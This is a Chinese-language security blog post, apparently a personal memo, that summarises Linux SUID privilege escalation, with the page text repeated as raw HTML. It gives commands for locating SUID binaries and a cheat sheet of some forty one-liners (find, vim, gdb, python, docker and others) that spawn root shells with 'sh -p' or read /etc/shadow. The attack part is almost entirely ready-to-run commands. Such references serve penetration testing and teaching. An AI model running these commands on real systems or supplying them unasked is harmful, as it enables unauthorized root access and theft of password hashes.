SUID 提权总结

Author： Juneha
发布时间：November 14, 2022
896 views
No comments
3930 words
Categories：备忘录

0x01什么是SUID

suid即Set owner User ID up on execution，是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。

通俗的来讲，假设我们现在有一个可执行文件/bin/find，其属主为root。当我们通过非root用户登录时，如果find命令设置了SUID权限且属主为root，而恰好find命令能通过-exec选项执行系统命令，我们可在非root用户下运行find执行命令，在执行文件时，该进程的权限将为root权限。达到提权的效果。利用此特性，我们可以实现利用SUID权限的特殊进行提权

0x02 可利用文件

2.1查找可利用文件

用find从/目录往下查找具有SUID权限位且文件属主为root的文件在并在控制台输出，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。

    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    
参数：
    /表示从文件系统的顶部（根）开始，查找每个目录
    -perm表示搜索后面的权限
    -u=s表示查找 root 用户拥有的文件
    -type表示我们正在寻找的文件类型
    f 表示普通文件，而不是目录或特殊文件
    2表示到进程的第二个文件描述符，即 stderr（标准错误）
    >表示重定向
    /dev/null是一个特殊的文件系统对象，它会丢弃写入其中的所有内容。

2.2 find

find是个比较常用的命令，find用来在系统中查找文件，同时它也有执行命令的能力，如果配置为使用SUID权限运行，则可以通过find执行的命令，并且都将以root身份去运行。但是现在很多系统上find命令默认没有SUID权限，所以这里手动为find设置一下SUID

chmod u+s filename   设置SUID位
chmod u-s filename   去掉SUID设置

然后切换到普通用户来测试这里随便查找或者新建一个文件来查找文件必须存在

find name -exec whoami \;

2.3 vim

vim的主要用途是做编辑器,是，如果以SUID运行，可以读取系统上的所有文件。

vim /etc/shadow

进入vim命令行模式，感叹号后面加命令

:set shell=/bin/sh
:shell

2.4 date

读文件虽然会报错，但是能获取文件内容

date -f /etc/shadow

2.5 strace

strace -o /dev/null  whoami

2.6 nice

nice whoami

2.7 ionice

ionice whoami

2.8 flock

flock -u / whoami

2.9 env

env whoami

2.10 time

time whoami

2.11 awk

awk 'BEGIN {system("whoami")}'

0x03常见SUID提权文件使用方法

命令	利用方法
centered	centered
xargs	xargs -a /dev/null sh -p
watch	watch -x sh -c ‘reset; exec sh -p 1>&0 2>&0'
timeout	timeout 7d /bin/sh -p
time	time /bin/sh -p
tclsh	1、tclsh 2、exec /bin/sh -p <@stdin >@stdout 2>@stderr
taskset	taskset 1 /bin/sh -p
stdbuf	stdbuf -i0 /bin/sh -p
strace	strace -o /dev/null /bin/sh -p
ssh	ssh -o ProxyCommand=';sh -p 0<&2 1>&2' x
setarch	setarch $(arch) /bin/sh -p
rsync	rsync -e ‘sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
rpm	rpm --eval ‘%{lua:os.execute("/bin/sh -p")}'
python	python -c ‘import os; os.execl("/bin/sh", "sh", "-p")'
php	1、CMD="/bin/sh" 2、 php -r "pcntl_exec('/bin/sh', ['-p']);"
nice	nice /bin/sh -p
nano	1、nano //运行nano程序 2、^R //按下ctrl-r 3、^X //按下ctrl-x 4、reset; sh -p 1>&0 2>&0 //输入下面的命令
more	1、more /etc/profile 2、!/bin/sh -p
logsave	logsave /dev/null /bin/sh -i -p
less	less /etc/profile //读取文件，在底行输入!/bin/sh -p
ksh	ksh -p
ip	1、ip netns add foo 2、ip netns exec foo /bin/sh -p 3、ip netns delete foo
ionice	ionice /bin/sh -p
git	git help status
gimp	gimp -idf --batch-interpreter=python-fu-eval -b ‘import os; os.execl("/bin/sh", "sh", "-p")'
gdb	gdb -nx -ex ‘python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
ftp	ftp //在底行输入"!/bin/sh -p"
flock	flock -u / /bin/sh -p
find	find . -exec /bin/sh -p ; -quit
expect	expect -c ‘spawn /bin/sh -p;interact'
env	env /bin/sh -p
ed	ed //在底行输入"!/bin/sh -p"
docker	docker run -v /:/mnt --rm -it alpine chroot /mnt sh
dmesg	dmesg -H//在底行输入"!/bin/sh -p"
csh	csh -b
bash	bash -p
awk	awk ‘BEGIN {system("/bin/bash -p")}'
perl	perl exec "/bin/bash";

0x04参考

http://tttang.com/archive/1793/
https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html
https://blog.csdn.net/CoreNote/article/details/122093180

Last modification：November 14, 2022

本文作者：Juneha
本文链接：https://blog.mo60.cn/index.php/archives/630.html
版权声明：本博客所有文章除特别声明外，均默认采用 CC BY-NC-SA 4.0 许可协议。
法律说明：
文章声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全，本文内容未隐讳任何个人、群体、公司。非文学作品，请勿过度理解，根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

SUID 提权总结

Juneha • 2022 年 11 月 14 日

<h2>0x01什么是SUID</h2><p>suid即Set owner User ID up on execution，是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。需要这种特殊权限的场景在Linux下很常见。</p><p>通俗的来讲，假设我们现在有一个可执行文件/bin/find，其属主为root。当我们通过非root用户登录时，如果find命令设置了SUID权限且属主为root，而恰好find命令能通过-exec选项执行系统命令，我们可在非root用户下运行find执行命令，在执行文件时，该进程的权限将为root权限。达到提权的效果。利用此特性，我们可以实现利用SUID权限的特殊进行提权</p><p><img src="http://blog.mo60.cn/usr/uploads/2022/11/792309313.png" alt="95385-ldnzrekzxr.png" title="95385-ldnzrekzxr.png"style=""></p><h2>0x02 可利用文件</h2><h4>2.1查找可利用文件</h4><p>用find从/目录往下查找具有SUID权限位且文件属主为root的文件在并在控制台输出，然后将所有错误重定向到/dev/null，从而仅列出该用户具有访问权限的那些二进制文件。</p><pre><code>    find / -perm -u=s -type f 2&gt;/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    
参数：
    /表示从文件系统的顶部（根）开始，查找每个目录
    -perm表示搜索后面的权限
    -u=s表示查找 root 用户拥有的文件
    -type表示我们正在寻找的文件类型
    f 表示普通文件，而不是目录或特殊文件
    2表示到进程的第二个文件描述符，即 stderr（标准错误）
    &gt;表示重定向
    /dev/null是一个特殊的文件系统对象，它会丢弃写入其中的所有内容。
</code></pre><h4>2.2 find</h4><p>find是个比较常用的命令，find用来在系统中查找文件，同时它也有执行命令的能力，如果配置为使用SUID权限运行，则可以通过find执行的命令，并且都将以root身份去运行。但是现在很多系统上find命令默认没有SUID权限，所以这里手动为find设置一下SUID</p><pre><code>chmod u+s filename   设置SUID位
chmod u-s filename   去掉SUID设置 
</code></pre><p><img src="http://blog.mo60.cn/usr/uploads/2022/11/2890460279.png" alt="81374-bg8xxoyj0wi.png" title="81374-bg8xxoyj0wi.png"style=""></p><p>然后切换到普通用户来测试这里随便查找或者新建一个文件来查找文件必须存在</p><pre><code>find name -exec whoami \;
</code></pre><p><img src="http://blog.mo60.cn/usr/uploads/2022/11/1368640537.png" alt="33790-x27lgxtq16c.png" title="33790-x27lgxtq16c.png"style=""></p><h4>2.3 vim</h4><p>vim的主要用途是做编辑器,是，如果以SUID运行，可以读取系统上的所有文件。</p><pre><code>vim /etc/shadow
</code></pre><p>进入vim命令行模式，感叹号后面加命令</p><pre><code>:set shell=/bin/sh
:shell
</code></pre><h4>2.4 date</h4><p>读文件虽然会报错，但是能获取文件内容</p><pre><code>date -f /etc/shadow
</code></pre><p><img src="http://blog.mo60.cn/usr/uploads/2022/11/1326029031.png" alt="36704-wxdcbes2knf.png" title="36704-wxdcbes2knf.png"style=""></p><h4>2.5 strace</h4><pre><code>strace -o /dev/null  whoami
</code></pre><p><img src="http://blog.mo60.cn/usr/uploads/2022/11/3798459849.png" alt="57973-37fvy6zs0sj.png" title="57973-37fvy6zs0sj.png"style=""></p><h4>2.6 nice</h4><pre><code>nice whoami
</code></pre><h4>2.7 ionice</h4><pre><code>ionice whoami
</code></pre><h4>2.8 flock</h4><pre><code>flock -u / whoami
</code></pre><h4>2.9 env</h4><pre><code>env whoami
</code></pre><h4>2.10 time</h4><pre><code>time whoami
</code></pre><h4>2.11 awk</h4><pre><code>awk 'BEGIN {system(&quot;whoami&quot;)}'
</code></pre><h2>0x03常见SUID提权文件使用方法</h2><table><thead><tr><th align="center">命令</th><th align="center">利用方法</th></tr></thead><tbody><tr><td align="center">centered</td><td align="center">centered</td></tr><tr><td align="center">xargs</td><td align="center">xargs -a /dev/null sh -p</td></tr><tr><td align="center">watch</td><td align="center">watch -x sh -c ‘reset; exec sh -p 1&gt;&0 2&gt;&0'</td></tr><tr><td align="center">timeout</td><td align="center">timeout 7d /bin/sh -p</td></tr><tr><td align="center">time</td><td align="center">time /bin/sh -p</td></tr><tr><td align="center">tclsh</td><td align="center">1、tclsh 2、exec /bin/sh -p &lt;@stdin &gt;@stdout 2&gt;@stderr</td></tr><tr><td align="center">taskset</td><td align="center">taskset 1 /bin/sh -p</td></tr><tr><td align="center">stdbuf</td><td align="center">stdbuf -i0 /bin/sh -p</td></tr><tr><td align="center">strace</td><td align="center">strace -o /dev/null /bin/sh -p</td></tr><tr><td align="center">ssh</td><td align="center">ssh -o ProxyCommand=';sh -p 0&lt;&2 1&gt;&2' x</td></tr><tr><td align="center">setarch</td><td align="center">setarch $(arch) /bin/sh -p</td></tr><tr><td align="center">rsync</td><td align="center">rsync -e ‘sh -p -c "sh -p 0&lt;&2 1&gt;&2"' 127.0.0.1:/dev/null</td></tr><tr><td align="center">rpm</td><td align="center">rpm --eval ‘%{lua:os.execute("/bin/sh -p")}'</td></tr><tr><td align="center">python</td><td align="center">python -c ‘import os; os.execl("/bin/sh", "sh", "-p")'</td></tr><tr><td align="center">php</td><td align="center">1、CMD="/bin/sh" 2、 php -r "pcntl_exec('/bin/sh', ['-p']);"</td></tr><tr><td align="center">nice</td><td align="center">nice /bin/sh -p</td></tr><tr><td align="center">nano</td><td align="center">1、nano //运行nano程序 2、^R //按下ctrl-r 3、^X //按下ctrl-x 4、reset; sh -p 1&gt;&0 2&gt;&0 //输入下面的命令</td></tr><tr><td align="center">more</td><td align="center">1、more /etc/profile 2、!/bin/sh -p</td></tr><tr><td align="center">logsave</td><td align="center">logsave /dev/null /bin/sh -i -p</td></tr><tr><td align="center">less</td><td align="center">less /etc/profile //读取文件，在底行输入!/bin/sh -p</td></tr><tr><td align="center">ksh</td><td align="center">ksh -p</td></tr><tr><td align="center">ip</td><td align="center">1、ip netns add foo 2、ip netns exec foo /bin/sh -p 3、ip netns delete foo</td></tr><tr><td align="center">ionice</td><td align="center">ionice /bin/sh -p</td></tr><tr><td align="center">git</td><td align="center">git help status</td></tr><tr><td align="center">gimp</td><td align="center">gimp -idf --batch-interpreter=python-fu-eval -b ‘import os; os.execl("/bin/sh", "sh", "-p")'</td></tr><tr><td align="center">gdb</td><td align="center">gdb -nx -ex ‘python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit</td></tr><tr><td align="center">ftp</td><td align="center">ftp //在底行输入"!/bin/sh -p"</td></tr><tr><td align="center">flock</td><td align="center">flock -u / /bin/sh -p</td></tr><tr><td align="center">find</td><td align="center">find . -exec /bin/sh -p ; -quit</td></tr><tr><td align="center">expect</td><td align="center">expect -c ‘spawn /bin/sh -p;interact'</td></tr><tr><td align="center">env</td><td align="center">env /bin/sh -p</td></tr><tr><td align="center">ed</td><td align="center">ed //在底行输入"!/bin/sh -p"</td></tr><tr><td align="center">docker</td><td align="center">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</td></tr><tr><td align="center">dmesg</td><td align="center">dmesg -H//在底行输入"!/bin/sh -p"</td></tr><tr><td align="center">csh</td><td align="center">csh -b</td></tr><tr><td align="center">bash</td><td align="center">bash -p</td></tr><tr><td align="center">awk</td><td align="center">awk ‘BEGIN {system("/bin/bash -p")}'</td></tr><tr><td align="center">perl</td><td align="center">perl exec "/bin/bash";</td></tr></tbody></table><h2>0x04参考</h2><p><span class="external-link"><a class="no-external-link" href="http://tttang.com/archive/1793/" target="_blank"><i data-feather="external-link"></i>http://tttang.com/archive/1793/</a></span><br><span class="external-link"><a class="no-external-link" href="https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html" target="_blank"><i data-feather="external-link"></i>https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html</a></span><br><span class="external-link"><a class="no-external-link" href="https://blog.csdn.net/CoreNote/article/details/122093180" target="_blank"><i data-feather="external-link"></i>https://blog.csdn.net/CoreNote/article/details/122093180</a></span></p>

SUID 提权总结

0x01什么是SUID

0x02 可利用文件

2.1查找可利用文件

2.2 find

2.3 vim

2.4 date

2.5 strace

2.6 nice

2.7 ionice

2.8 flock

2.9 env

2.10 time

2.11 awk

0x03常见SUID提权文件使用方法

0x04参考

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

题目+答案+2023年全国职业院校技能大赛信息安全管理与评估真题

后渗透神器Cobalt Strike使用教程

2023年全国职业院校技能大赛信息安全管理与评估-3阶段web复盘模拟解析

记第一次cve申请之旅

记2022年福建省第三届“闽盾杯”网络空间安全大赛黑盾赛道从线上初赛到决赛writeup解析

typecho1.1源码阅读-安装模块

无逗号mysql注入方法和sqlmap tamper

xss靶场解析+xssbot搭建

Windows系统创建隐藏账户(影子账户)的方法

编写Sqlmap-Tamper

SUID 提权总结

0x01什么是SUID

0x02 可利用文件

2.1查找可利用文件

2.2 find

2.3 vim

2.4 date

2.5 strace

2.6 nice

2.7 ionice

2.8 flock

2.9 env

2.10 time

2.11 awk

0x03常见SUID提权文件使用方法

0x04参考

Leave a Comment Cancel reply 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

SUID 提权 总结

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款，评论的邮箱不会被公开仅用于接收回复。

SUID 提权总结